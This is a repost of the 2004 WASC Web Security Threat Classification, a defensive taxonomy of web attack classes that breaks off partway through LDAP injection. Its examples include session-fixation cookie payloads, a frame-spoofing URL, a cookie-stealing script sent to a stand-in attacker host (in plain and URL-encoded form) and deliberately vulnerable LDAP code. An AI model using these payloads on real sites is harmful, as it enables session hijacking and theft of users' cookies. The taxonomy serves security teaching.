본문 바로가기

IT/Security

Web Application Security

Web Application Security Consortium:
Threat Classification
www.webappsec.org
Version: 1.00
Copyright 2004, Web Application Security Consortium. All rights reserved.




Description
The Web Security Threat Classification is a cooperative effort to
clarify and organize the threats to the security of a web site. The
members of the Web Application Security Consortium have created
this project to develop and promote industry standard terminology for
describing these issues. Application developers, security
professionals, software vendors, and compliance auditors will have
the ability to access a consistent language for web security related
issues.



Goals
- Identify all known web application security classes of attack.
- Agree on naming for each class of attack.
- Develop a structured manner to organize the classes of attack.
- Develop documentation that provides generic descriptions of
each class of attack.



Documentation Uses
Further understand and articulate the security risks that threaten web
sites. Enhance secure programming practices to prevent security
issues during application development. Serve as a guideline to
determine if web sites have been designed, developed, and reviewed
against all the known threats. Assist with understanding the
capabilities and selection of web security solutions.




Table of Contents
DESCRIPTION
GOALS
DOCUMENTATION USES
TABLE OF CONTENTS
OVERVIEW
BACKGROUND
CONTRIBUTORS
CHECKLIST
CLASSES OF ATTACK
1 Authentication
1.1 Brute Force
1.2 Insufficient Authentication
1.3 Weak Password Recovery Validation
2 Authorization
2.1 Credential/Session Prediction
2.2 Insufficient Authorization
2.3 Insufficient Session Expiration
2.4 Session Fixation
3 Client-side Attacks
3.1 Content Spoofing
3.2 Cross-site Scripting
4 Command Execution
4.1 Buffer Overflow
4.2 Format String Attack
4.3 LDAP Injection
4.4 OS Commanding
4.5 SQL Injection
4.6 SSI Injection
4.7 XPath Injection
5 Information Disclosure
5.1 Directory Indexing
5.2 Information Leakage
5.3 Path Traversal
5.4 Predictable Resource Location
6 Logical Attacks
6.1 Abuse of Functionality
6.2 Denial of Service
6.3 Insufficient Anti-automation
6.4 Insufficient Process Validation
CONTACT
APPENDIX
1.1 HTTP Response Splitting
1.2 Web Server/Application Fingerprinting
LICENSE






Overview
For many organizations, web sites serve as mission critical systems
that must operate smoothly to process millions of dollars in daily
online transactions. However, the actual value of a web site needs to
be appraised on a case-by-case basis for each organization. Tangible
and intangible value of anything is difficult to measure in monetary
figures alone.

Web security vulnerabilities continually impact the risk of a web site.
When any web security vulnerability is identified, performing the
attack requires using at least one of several application attack
techniques. These techniques are commonly referred to as the class
of attack (the way a security vulnerability is taken advantage of).
Many of these types of attack have recognizable names such as
Buffer Overflows, SQL Injection, and Cross-site Scripting. As a
baseline, the class of attack is the method the Web Security Threat
Classification will use to explain and organize the threats to a web
site.

The Web Security Threat Classification will compile and distill the
known unique classes of attack, which have presented a threat to
web sites in the past. Each class of attack will be given a standard
name and explained with thorough documentation discussing the key
points. Each class will also be organized in a flexible structure.

The formation of a Web Security Threat Classification will be of
exceptional value to application developers, security professionals,
software vendors or anyone else with an interest in web security.
Independent security review methodologies, secure development
guidelines, and product/service capability requirements will all benefit
from the effort.




Background
Over the last several years, the web security industry has adopted
dozens of confusing and esoteric terms describing vulnerability
research. Terms such as Cross-site Scripting, Parameter Tampering,
and Cookie Poisoning have all been given inconsistent names and
double meanings attempting to describe their impact.

For example, when a web site is vulnerable to Cross-site Scripting,
the security issue can result in the theft of a users cookie. Once the
cookie has been compromised, this enables someone to perform a
session hijacking and take over the user's online account. To take
advantage of the vulnerability, an attacker uses data input
manipulation by way of URL parameter tampering.

This previous attack description is confusing and can be described
using all manner of technical jargon. This complex and
interchangeable vocabulary causes frustration and disagreement in
open forums, even when the participants agree on the core concepts.

Through the years, there has been no well-documented,
standardized, complete, or accurate resource describing these
issues. In doing our work, we've relied upon tidbits of information
from a handful of books, dozens of white papers and hundreds of
presentations.

When web security newcomers arrive to study, they quickly become
overwhelmed and confused by the lack of standard language present.
This confusion traps the web security field in a blur and slows
ongoing progress. We need a formal, standardized approach to
discuss web security issues as we continue to improve the security of
the Web.




Contributors

Robert Auger - SPI Dynamics
Ryan Barnett - Center for Internet Security (Apache Project Lead)
Yuval Ben-Itzhak - Individual
Erik Caso - NT OBJECTives
Cesar Cerrudo - Application Security Inc.
Sacha Faust - SPI Dynamics
JD Glaser - NT OBJECTives
Jeremiah Grossman - WhiteHat Security
Sverre H. Huseby - Individual
Amit Klein - Sanctum
Mitja Kolsek - Acros Security
Aaron C. Newman - Application Security Inc.
Steve Orrin - Sanctum
Bill Pennington - WhiteHat Security
Ray Pompon - Conjungi Networks
Mike Shema - NT OBJECTives
Ory Segal - Sanctum
Caleb Sima - SPI Dynamics



Checklist


Authentication

Brute Force:
A Brute Force attack is an automated process of trial and error used to
guess a person's username, password, credit-card number or
cryptographic key.

Insufficient Authentication:
Insufficient Authentication occurs when a web site permits an attacker to
access sensitive content or functionality without having to properly
authenticate.

Weak Password Recovery Validation:
Weak Password Recovery Validation is when a web site permits an
attacker to illegally obtain, change or recover another user's password.



Authorization

Credential/Session Prediction:
Credential/Session Prediction is a method of hijacking or impersonating a
web site user.

Insufficient Authorization:
Insufficient Authorization is when a web site permits access to sensitive
content or functionality that should require increased access control
restrictions.

Insufficient Session Expiration:
Insufficient Session Expiration is when a web site permits an attacker to
reuse old session credentials or session IDs for authorization.

Session Fixation:
Session Fixation is an attack technique that forces a user's session ID to
an explicit value.



Client-side Attacks

Content Spoofing:
Content Spoofing is an attack technique used to trick a user into believing
that certain content appearing on a web site is legitimate and not from an
external source.

Cross-site Scripting:
Cross-site Scripting (XSS) is an attack technique that forces a web site to
echo attacker-supplied executable code, which loads in a user's browser.



Command Execution

Buffer Overflow:
Buffer Overflow exploits are attacks that alter the flow of an application by
overwriting parts of memory.

Format String Attack:
Format String Attacks alter the flow of an application by using string
formatting library features to access other memory space.

LDAP Injection:
LDAP Injection is an attack technique used to exploit web sites that
construct LDAP statements from user-supplied input.

OS Commanding:
OS Commanding is an attack technique used to exploit web sites by
executing Operating System commands through manipulation of
application input.

SQL Injection:
SQL Injection is an attack technique used to exploit web sites that
construct SQL statements from user-supplied input.

SSI Injection:
SSI Injection (Server-side Include) is a server-side exploit technique that
allows an attacker to send code into a web application, which will later be
executed locally by the web server.

XPath Injection:
XPath Injection is an attack technique used to exploit web sites that
construct XPath queries from user-supplied input.



Information Disclosure

Directory Indexing:
Automatic directory listing/indexing is a web server function that lists all of
the files within a requested directory if the normal base file is not present.

Information Leakage:
Information Leakage is when a web site reveals sensitive data, such as
developer comments or error messages, which may aid an attacker in
exploiting the system.

Path Traversal:
The Path Traversal attack technique forces access to files, directories,
and commands that potentially reside outside the web document root
directory.

Predictable Resource Location
Predictable Resource Location is an attack technique used to uncover
hidden web site content and functionality.



Logical Attacks

Abuse of Functionality:
Abuse of Functionality is an attack technique that uses a web site's own
features and functionality to consume, defraud, or circumvents access
controls mechanisms.

Denial of Service:
Denial of Service (DoS) is an attack technique with the intent of
preventing a web site from serving normal user activity.

Insufficient Anti-automation:
Insufficient Anti-automation is when a web site permits an attacker to
automate a process that should only be performed manually.

Insufficient Process Validation:
Insufficient Process Validation is when a web site permits an attacker to
bypass or circumvent the intended flow control of an application.




Classes of Attack

1 Authentication
The Authentication section covers attacks that target a web site's
method of validating the identity of a user, service or application.
Authentication is performed using at least one of three mechanisms:
"something you have", "something you know" or "something you are".
This section will discuss the attacks used to circumvent or exploit the
authentication process of a web site.



1.1 Brute Force
A Brute Force attack is an automated process of trial and error used
to guess a person's username, password, credit-card number or
cryptographic key.

Many systems will allow the use of weak passwords or cryptographic
keys, and users will often choose easy to guess passwords, possibly
found in a dictionary.  Given this scenario, an attacker would cycle
though the dictionary word by word, generating thousands or
potentially millions of incorrect guesses searching for the valid
password. When a guessed password allows access to the system,
the brute force attack has been successful and the attacker is able
access the account.

The same trial and error technique is also applicable to guessing
encryption keys. When a web site uses a weak or small key size, its
possible for an attacker to guess a correct key by testing all possible
keys.

Essentially there are two types of brute force attacks, (normal) brute
force and reverse brute force.  A normal brute force attack uses a
single username against many passwords.  A reverse brute force
attack uses many usernames against one password. In systems with
millions of user accounts, the odds of multiple users having the same
password dramatically increases.  While brute force techniques are
highly popular and often successful, they can take hours, weeks or
years to complete.

Example
Username = Jon
Passwords = smith, michael-jordan, [pet names], [birthdays], [car
names],

Usernames = Jon, Dan, Ed, Sara, Barbara, .....
Password = 12345678


References
"Brute Force Attack", Imperva Glossary
http://www.imperva.com/application_defense_center/glossary/brute_f
orce.html

"iDefense: Brute-Force Exploitation of Web Application Session ID's",
By David Endler - iDEFENSE Labs
http://www.cgisecurity.com/lib/SessionIDs.pdf




1.2 Insufficient Authentication
Insufficient Authentication occurs when a web site permits an attacker
to access sensitive content or functionality without having to properly
authenticate.  Web-based administration tools are a good example of
web sites providing access to sensitive functionality. Depending on
the specific online resource, these web applications should not be
directly accessible without the user required to properly verify their
identity.

To get around setting up authentication, some resources are
protected by "hiding" the specific location and not linking the location
into the main web site or other public places. However, this approach
is nothing more than "Security Through Obscurity". Its important to
understand that simply because a resource is unknown to an
attacker, it still remains accessible directly through a specific URL.
The specific URL could be discovered through a Brute Force probing
for common file and directory locations (/admin for example), error
messages, referrer logs, or perhaps documented in help files. These
resources, whether they are content or functionality driven, should be
adequately protected.

Example
Many web applications have been designed with administrative
functionality location directory off the root directory (/admin/). This
directory is usually never linked to anywhere on the web site, but can
still be accessed using a standard web browser.
Since the user or developer never expected anyone to view this page
since its not linked, adding authentication is many times overlooked.
If an attacker were to simply visit this page, they would obtain
complete administrative access to the web site.




1.3 Weak Password Recovery Validation
Weak Password Recovery Validation is when a web site permits an
attacker to illegally obtain, change or recover another user's
password. Conventional web site authentication methods require
users to select and remember a password or passphrase. The user
should be the only person that knows the password and it must be
remembered precisely. As time passes, a user's ability to remember
a password fades. The matter is further complicated when the
average user visits 20 sites requiring them to supply a password.
(RSA Survey: http://news.bbc.co.uk/1/hi/technology/3639679.stm)
Thus, Password Recovery is an important part in servicing online
users.

Examples of automated password recovery processes include
requiring the user to answer a "secret question" defined as part of the
user registration process. This question can either be selected from a
list of canned questions or supplied by the user. Another mechanism
in use is having the user provide a "hint" during registration that will
help the user remember his password. Other mechanisms require the
user to provide several pieces of personal data such as their social
security number, home address, zip code etc. to validate their
identity. After the user has proven who they are, the recovery system
will display or e-mail them a new password.

A web site is considered to have Weak Password Recovery
Validation when an attacker is able to foil the recovery mechanism
being used. This happens when the information required to validate a
user's identity for recovery is either easily guessed or can be
circumvented. Password recovery systems may be compromised
through the use of brute force attacks, inherent system weaknesses,
or easily guessed secret questions.

Example
(Weak methods of password recovery)

Information Verification
Many web sites only require the user to provide their e-mail address
in combination with their home address and telephone number. This
information can be easily obtained from any number of online white
pages. As a result, the verification information is not very secret.
Further, the information can be compromised via other methods such
as Cross-site Scripting and Phishing Scams.

Password Hints
A web site using hints to help remind the user of their password can
be attacked because the hint aids Brute Force attacks. A user may
have fairly good password of "122277King" with a corresponding
password hint of "bday+fav author". An attacker can glean from this
hint that the user's password is a combination of the users birthday
and the user's favorite author. This helps narrowing the dictionary
Brute Force attack against the password significantly.

Secret Question and Answer
A user's password could be "Richmond" with a secret question of
"Where were you born". An attacker could then limit a secret answer
Brute Force attack to city names. Furthermore, if the attacker knows
a little about the target user, learning their birthplace is also an easy
task.


References
"Protecting Secret Keys with Personal Entropy", By Carl Ellison, C. Hall, R. Milbert, and B. Schneier
http://www.schneier.com/paper-personal-entropy.html

"Emergency Key Recovery without Third Parties", Carl Ellison
http://theworld.com/~cme/html/rump96.html




2 Authorization
The Authorization section covers attacks that target a web site's
method of determining if a user, service, or application has the
necessary permissions to perform a requested action. For example,
many web sites should only allow certain users to access specific
content or functionality. Other times a user's access to other
resources might be restricted. Using various techniques, an attacker
can fool a web site into increasing their privileges to protected areas.



2.1 Credential/Session Prediction
Credential/Session Prediction is a method of hijacking or
impersonating a web site user. Deducing or guessing the unique
value that identifies a particular session or user accomplishes the
attack. Also known as Session Hijacking, the consequences could
allow attackers the ability to issue web site requests with the
compromised user's privileges.

Many web sites are designed to authenticate and track a user when
communication is first established. To do this, users must prove their
identity to the web site, typically by supplying a username/password
(credentials) combination. Rather than passing these confidential
credentials back and forth with each transaction, web sites will
generate a unique "session ID" to identify the user session as
authenticated.  Subsequent communication between the user and the
web site is tagged with the session ID as "proof" of the authenticated
session. If an attacker is able predict or guess the session ID of
another user, fraudulent activity is possible.

Example
Many web sites attempt to generate session IDs using proprietary
algorithms. These custom methodologies might generation session
IDs by simply incrementing static numbers. Or there could be more
complex procedures such as factoring in time and other computer
specific variables.

The session ID is then stored in a cookie, hidden form-field, or URL. If
an attacker can determine the algorithm used to generate the session
ID, an attack can be mounted as follows:

1) attacker connects to the web application acquiring the current
session ID.
2) attacker calculates or Brute Forces the next session ID.
3) attacker switches the current value in the cookie/hidden form-
field/URL and assumes the identity of the next user.

References
"iDefense: Brute-Force Exploitation of Web Application Session ID's", By David Endler - iDEFENSE Labs
http://www.cgisecurity.com/lib/SessionIDs.pdf

"Best Practices in Managing HTTP-Based Client Sessions", Gunter Ollmann - X-Force Security Assessment Services EMEA
http://www.itsecurity.com/papers/iss9.htm

"A Guide to Web Authentication Alternatives", Jan Wolter
http://www.unixpapa.com/auth/homebuilt.html




2.2 Insufficient Authorization
Insufficient Authorization is when a web site permits access to
sensitive content or functionality that should require increased access
control restrictions. When a user is authenticated to a web site, it
does not necessarily mean that he should have full access to all
content and that functionality should be granted arbitrarily.

Authorization procedures are performed after authentication,
enforcing what a user, service or application is permitted to do.
Thoughtful restrictions should govern particular web site activity
according to policy. Sensitive portions of a web site may need to be
restricted to everyone expect to perhaps an administrator.

Example
In the past, many web sites have stored administrative content and/or
functionality the in hidden directories such as /admin or /logs. If an
attacker was to directly request these directories, he would be
allowed access. He may thus be able to reconfigure the web server,
access sensitive information or compromise the web site.

References
"Brute Force Attack", Imperva Glossary
http://www.imperva.com/application_defense_center/glossary/brute_force.html

"iDefense: Brute-Force Exploitation of Web Application Session ID's", By David Endler - iDEFENSE Labs
http://www.cgisecurity.com/lib/SessionIDs.pdf




2.3 Insufficient Session Expiration
Insufficient Session Expiration is when a web site permits an attacker
to reuse old session credentials or session IDs for authorization.
Insufficient Session Expiration increases a web site's exposure to
attacks that steal or impersonate other users.

Since HTTP is a stateless protocol, web sites commonly use session
IDs to uniquely identify a user from request to request. Consequently,
each session ID's confidentiality must be maintained in order to
prevent multiple users from accessing the same account. A stolen
session ID can be used to view another user's account or perform a
fraudulent transaction.

The lack of proper session expiration may improve the likely success
of certain attacks. For example, an attacker may intercept a session
ID, possibly via a network sniffer or Cross-site Scripting attack.
Although short session expiration times do not help if a stolen token
is immediately used, they will protect against ongoing replaying of the
session ID. In another scenario, a user might access a web site from
a shared computer (such as at a library, Internet cafe, or open work
environment). Insufficient Session Expiration could allow an attacker
to use the browser's back button to access web pages previously
accessed by the victim.

A long expiration time increases an attacker's chance of successfully
guessing a valid session ID. The long length of time increases the
number of concurrent and open sessions, which enlarges the pool of
numbers an attacker might guess.


Example
In a shared computing environment (more than one person has
unrestricted physical access to a computer), Insufficient Session
Expiration can be exploited to view another user's web activity. If a
web site's logout function merely sends the victim to the site's home
page without ending the session, another user could go through the
browser's page history and view pages accessed by the victim. Since
the victim's session ID has not been expired, the attacker would be
able to see the victim's session without being required to supply
authentication credentials.


References
"Dos and Don'ts of Client Authentication on the Web", Kevin Fu,
Emil Sit, Kendra Smith, Nick Feamster - MIT Laboratory for Computer Science
http://cookies.lcs.mit.edu/pubs/webauth:tr.pdf




2.4 Session Fixation
Session Fixation is an attack technique that forces a user's session
ID to an explicit value. Depending on the functionality of the target
web site, a number of techniques can be utilized to "fix" the session
ID value. These techniques range from Cross-site Scripting exploits
to peppering the web site with previously made HTTP requests. After
a user's session ID has been fixed, the attacker will wait for them to
login. Once the user does so, the attacker uses the predefined
session ID value to assume their online identity.

Generally speaking there are two types of session management
systems when it comes to ID values. The first type is "permissive"
systems that allow web browsers to specify any ID. The second type
is "strict" systems that only accept server-side generated values. With
permissive systems, arbitrary session IDs are maintained without
contact with the web site. Strict systems require the attacker to
maintain the "trap-session", with periodic web site contact, preventing
inactivity timeouts.

Without active protection against session fixation, the attack can be
mounted against any web site using sessions to identify
authenticated users. Web sites using sessions IDs are normally
cookie-based, but URLs and hidden form-fields are used as well.
Unfortunately, cookie-based sessions are the easiest to attack.  Most
of the currently identified attack methods are aimed toward the
fixation of cookies.

In contrast to stealing a user's session ID after they have logged into
a web site, session fixation provides a much wider window of
opportunity. The active part of the attack takes place before the user
logs in.


Example
The session fixation attack is normally a three step process:

1) Session set-up
The attacker sets up a "trap-session" for the target web site and
obtains that session's ID. Or, the attacker may select an arbitrary
session ID used in the attack. In some cases, the established trap
session value must be maintained (kept alive) with repeated web
site contact.

2) Session fixation
The attacker introduces the trap session value into the user's
browser and fixes the user's session ID.

3) Session entrance
The attacker waits until the user logs into the target web site. 
When the user does so, the fixed session ID value will be used
and the attacker may take over.

Fixing a user's session ID value can be achieved with the following
techniques:

Issuing a new session ID cookie value using a client-side script
A Cross-site Scripting vulnerability present on any web site in the
domain can be used to modify the current cookie value.

Code Snippet:

http://example/<script>document.cookie="sessionid=1234;%20domain=.example.dom";</script>.idc


Issuing a cookie using the META tag
This method is similar to the previous one, but also effective when
Cross-site Scripting countermeasures prevent the injection of HTML
script tags, but not meta tags.

Code Snippet:

http://example/<meta%20http-equiv=Set-Cookie%20
content="sessionid=1234;%20domain=.example.dom">.idc

Issuing a cookie using an HTTP response header
The attacker forces either the target web site, or any other site in the
domain, to issue a session ID cookie. This can be achieved in many
ways:

_ Breaking into a web server in the domain (e.g., a poorly
maintained WAP server)
_ Poisoning a user's DNS server, effectively adding the attacker's
web server to the domain
_ Setting up a malicious web server in the domain (e.g., on a
workstation in Windows 2000 domain, all workstations are also
in the DNS domain)
_ Exploiting an HTTP response splitting attack

Note: A long-term Session Fixation attack can be achieved by issuing
a persistent cookie (e.g., expiring in 10 years), which will keep the
session fixed even after the user restarts the computer.

Code Snippet:

http://example/<script>document.cookie="sessionid=1234;%20
Expires=Friday,%201-Jan2010%2000:00:00%20GMT";</script>.idc




References
"Session Fixation Vulnerability in Web-based Applications", By Mitja Kolsek - Acros Security
http://www.acrossecurity.com/papers/session_fixation.pdf

"Divide and Conquer", By Amit Klein - Sanctum
http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf




3 Client-side Attacks
The Client-side Attacks section focuses on the abuse or exploitation
of a web site's users.  When a user visits a web site, trust is
established between the two parties both technologically and
psychologically. A user expects web sites they visit to deliver valid
content. A user also expects the web site not to attack them during
their stay. By leveraging these trust relationship expectations, an
attacker may employ several techniques to exploit the user.



3.1 Content Spoofing
Content Spoofing is an attack technique used to trick a user into
believing that certain content appearing on a web site is legitimate
and not from an external source.

Some web pages are served using dynamically built HTML content
sources.  For example, the source location of a frame (<frame
src="http://foo.example/file.html">) could be specified
by a URL parameter value.
(http://foo.example/page?frame_src=http://foo.examp
le/file.html). An attacker may be able to replace the
"frame_src" parameter value with
"frame_src=http://attacker.example/spoof.html". When
the resulting web page is served, the browser location bar visibly
remains under the user expected domain (foo.example), but the
foreign data (attacker.example) is shrouded by legitimate
content.

Specially crafted links can be sent to a user via e-mail, instant
messages, left on bulletin board postings, or forced upon users by a
Cross-site Scripting attack. If an attacker gets a user to visit a web
page designated by their malicious URL, the user will believe he is
viewing authentic content from one location when he is not. Users will
implicitly trust the spoofed content since the browser location bar
displays http://foo.example, when in fact the underlying HTML
frame is referencing http://attacker.example.

This attack exploits the trust relationship established between the
user and the web site.  The technique has been used to create fake
web pages including login forms, defacements, false press releases,
etc.


Example
Creating a spoofed press release. Lets say a web site uses
dynamically created HTML frames for their press release web pages.
A user would visit a link such as
(http://foo.example/pr?pg=http://foo.example/pr/010
12003.html). The resulting web page HTML would be:



Code Snippet:

<HTML>
<FRAMESET COLS="100, *">
<FRAME NAME="pr_menu" SRC="menu.html">
<FRAME NAME="pr_content"
SRC="http://foo.example/pr/01012003.html>
</FRAMESET>
</HTML>


The "pr" web application in the example above creates the HTML
with a static menu and a dynamically generated FRAME SRC. The
"pr_content" frame pulls its source from the URL parameter value
of "pg" to display the requested press release content. But what if an
attacker altered the normal URL to
http://foo.example/pr?pg=http://attacker.example/sp
oofed_press_release.html? Without properly sanity checking
the "pg" value, the resulting HTML would be:

Code Snippet:

<HTML>
<FRAMESET COLS="100, *">
<FRAME NAME="pr_menu" SRC="menu.html">
<FRAME NAME="pr_content" SRC="
http://attacker.example/spoofed_press_release.html">
</FRAMESET>
</HTML>


To the end user, the "attacker.example" spoofed content appears
authentic and delivered from a legitimate source.


References
"A new spoof: all frames-based sites are vulnerable" - SecureXpert
Labs
http://tbtf.com/archive/11-17-98.html#s02



3.2 Cross-site Scripting
Cross-site Scripting (XSS) is an attack technique that forces a web
site to echo attacker-supplied executable code, which loads in a
user's browser. The code itself is usually written in HTML/JavaScript,
but may also extend to VBScript, ActiveX, Java, Flash, or any other
browser-supported technology.

When an attacker gets a user's browser to execute his code, the
code will run within the security context (or zone) of the hosting web
site.  With this level of privilege, the code has the ability to read,
modify and transmit any sensitive data accessible by the browser. A
Cross-site Scripted user could have his account hijacked (cookie
theft), their browser redirected to another location, or possibly shown
fraudulent content delivered by the web site they are visiting.  Cross-
site Scripting attacks essentially compromise the trust relationship
between a user and the web site.

There are two types of Cross-site Scripting attacks, non-persistent
and persistent. Non-persistent attacks require a user to visit a
specially crafted link laced with malicious code. Upon visiting the link,
the code embedded in the URL will be echoed and executed within
the user's web browser. Persistent attacks occur when the malicious
code is submitted to a web site where it's stored for a period of time.
Examples of an attacker's favorite targets often include message
board posts, web mail messages, and web chat software. The
unsuspecting user is not required to click on any link, just simply view
the web page containing the code.


Example

Persistent Attack
Many web sites host bulletin boards where registered users may post
messages. A registered user is commonly tracked using a session ID
cookie authorizing them to post. If an attacker were to post a
message containing a specially crafted JavaScript, a user reading
this message could have their cookies and their account
compromised.

Cookie Stealing Code Snippet:

<SCRIPT>
document.location= 'http://attackerhost.example/cgi-
bin/cookiesteal.cgi?'+document.cookie
</SCRIPT>


Non-Persistent Attack
Many web portals offer a personalized view of a web site and greet a
logged in user with "Welcome, <your username>". Sometimes the
data referencing a logged in user are stored within the query string of
a URL and echoed to the screen

Portal URL example:
http://portal.example/index.php?sessionid=12312312&
username=Joe

In the example above we see that the username "Joe" is stored in the
URL. The resulting web page displays a  "Welcome, Joe" message. If
an attacker were to modify the username field in the URL, inserting a
cookie-stealing JavaScript, it would possible to gain control of the
user's account.

A large percentage of people will be suspicious if they see JavaScript
embedded in a URL, so most of the time an attacker will URL Encode
their malicious payload similar to the example below.

URL Encoded example of Cookie Stealing URL:
http://portal.example/index.php?sessionid=12312312&
username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
%63%72%69%70%74%3E

Decoded example of Cookie Stealing URL:
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attacker
host.example/cgi-
bin/cookiesteal.cgi?'+document.cookie</script>


References
"CERT?Advisory CA-2000-02 Malicious HTML Tags Embedded in
Client Web Requests"
http://www.cert.org/advisories/CA-2000-02.html

"The Cross Site Scripting FAQ" - CGISecurity.com
http://www.cgisecurity.com/articles/xss-faq.shtml

"Cross Site Scripting Info"
http://httpd.apache.org/info/css-security/

"24 Character entity references in HTML 4"
http://www.w3.org/TR/html4/sgml/entities.html

"Understanding Malicious Content Mitigation for Web Developers"
http://www.cert.org/tech_tips/malicious_code_mitigation.html

"Cross-site Scripting: Are your web applications vulnerable?", By
Kevin Spett - SPI Dynamics
http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf

"Cross-site Scripting Explained", By Amit Klein - Sanctum
http://www.sanctuminc.com/pdf/WhitePaper_CSS_Explained.pdf

"HTML Code Injection and Cross-site Scripting", By Gunter Ollmann
http://www.technicalinfo.net/papers/CSS.html




4 Command Execution
The Command Execution section covers attacks designed to execute
remote commands on the web site. All web sites utilize user-supplied
input to fulfill requests. Often these user-supplied data are used to
create construct commands resulting in dynamic web page content. If
this process is done insecurely, an attacker could alter command
execution.



4.1 Buffer Overflow
Buffer Overflow exploits are attacks that alter the flow of an
application by overwriting parts of memory. Buffer Overflow is a
common software flaw that results in an error condition. This error
condition occurs when data written to memory exceed the allocated
size of the buffer. As the buffer is overflowed, adjacent memory
addresses are overwritten causing the software to fault or crash.
When unrestricted, properly-crafted input can be used to overflow the
buffer resulting in a number of security issues.

A Buffer Overflow can be used as a Denial of Service attack when
memory is corrupted, resulting in software failure. Even more critical
is the ability of a Buffer Overflow attack to alter application flow and
force unintended actions. This scenario can occur in several ways.
Buffer Overflow vulnerabilities have been used to overwrite stack
pointers and redirect the program to execute malicious instructions.
Buffer Overflows have also been used to change program variables.

Buffer Overflow vulnerabilities have become quite common in the
information security industry and have often plagued web servers.
However, they have not been commonly seen or exploited at the web
application layer itself. The primary reason is that an attacker needs
to analyze the application source code or the software binaries. Since
the attacker must exploit custom code on a remote system, they
would have to perform the attack blind, making success very difficult.

Buffer Overflows vulnerabilities most commonly occur in
programming languages such as C and C++. A Buffer Overflow can
occur in a CGI program or when a web page accesses a C program.

References
"Inside the Buffer Overflow Attack: Mechanism, Method and Prevention", By Mark E. Donaldson - GSEC
http://www.sans.org/rr/code/inside_buffer.php

"w00w00 on Heap Overflows", By Matt Conover - w00w00 Security Team
http://www.w00w00.org/files/articles/heaptut.txt

"Smashing The Stack For Fun And Profit", By Aleph One - Phrack 49
http://www.insecure.org/stf/smashstack.txt




4.2 Format String Attack
Format String Attacks alter the flow of an application by using string
formatting library features to access other memory space.
Vulnerabilities occur when user-supplied data are used directly as
formatting string input for certain C/C++ functions (e.g. fprintf,
printf, sprintf, setproctitle, syslog, ...).

If an attacker passes a format string consisting of printf conversion
characters (e.g. "%f", "%p", "%n", etc.) as parameter value to the web
application, they may:

_ Execute arbitrary code on the server
_ Read values off the stack
_ Cause segmentation faults / software crashes


Example
Lets assume that a web application has a parameter
emailAddress, dictated by the user. The application prints the
value of this variable by using the printf function:


printf(emailAddress);



If the value sent to the emailAddress parameter contains
conversion characters, printf will parse the conversion characters
and use the additionally supplied corresponding arguments. If no
such arguments actually exist, data from the stack will be used in
accordance to the order expected by the printf function.

The possible uses of the Format String Attacks in such a case can
be:

_ Read data from the stack: If the output stream of the printf
function is presented back to the attacker, he may read values
on the stack by sending the conversion character "%x" (one or
more times).
_ Read character strings from the process' memory: If the output
stream of the printf function is presented back to the attacker,
he can read character strings at arbitrary memory locations by
using the "%s" conversion character (and other conversion
characters in order to reach specific locations).
_ Write an integer to locations in the process' memory: By using
the "%n" conversion character, an attacker may write an integer
value to any location in memory. (E.g. overwrite important
program flags that control access privileges, or overwrite return
addresses on the stack, etc.)


References
"(Maybe) the first publicly known Format Strings exploit"
http://archives.neohapsis.com/archives/bugtraq/1999-q3/1009.html

"Analysis of format string bugs", By Andreas Thuemmel
http://downloads.securityfocus.com/library/format-bug-analysis.pdf

"Format string input validation error in wu-ftpd site_exec() function"
http://www.kb.cert.org/vuls/id/29823



4.3 LDAP Injection
LDAP Injection is an attack technique used to exploit web sites that
construct LDAP statements from user-supplied input.

Lightweight Directory Access Protocol (LDAP) is an open-standard
protocol for both querying and manipulating X.500 directory services.
The LDAP protocol runs over Internet transport protocols, such as
TCP. Web applications may use user-supplied input to create custom
LDAP statements for dynamic web page requests.

When a web application fails to properly sanitize user-supplied input,
it is possible for an attacker to alter the construction of an LDAP
statement. When an attacker is able to modify an LDAP statement,
the process will run with the same permissions as the component that
executed the command. (e.g. Database server, Web application
server, Web server, etc.). This can cause serious security problems
where the permissions grant the rights to query, modify or remove
anything inside the LDAP tree.

The same advanced exploitation techniques available in SQL
Injection can also be similarly applied in LDAP Injection.

Example

Vulnerable code with comments:

line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:
line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : " +ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i) +"</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>


Looking at the code, we see on line 10 that the userName variable is
initialized with the parameter user and then quickly validated to see
if the value is empty. If the value is not empty, the userName is used
to initialize the filter variable on line 18. This new variable is
directly used to construct an LDAP query that will be use in the call to
SearchFilter on line 27. In this scenario, the attacker has
complete control over what will be queried on the LDAP server, and
he will get the result of the query when the code hits line 32 to 40
where all the results and their attributes are displayed back to the
user.

Attack Example

http://example/ldapsearch.asp?user=*

In the example above, we send the * character in the user parameter
which will result in the filter variable in the code to be initialized with
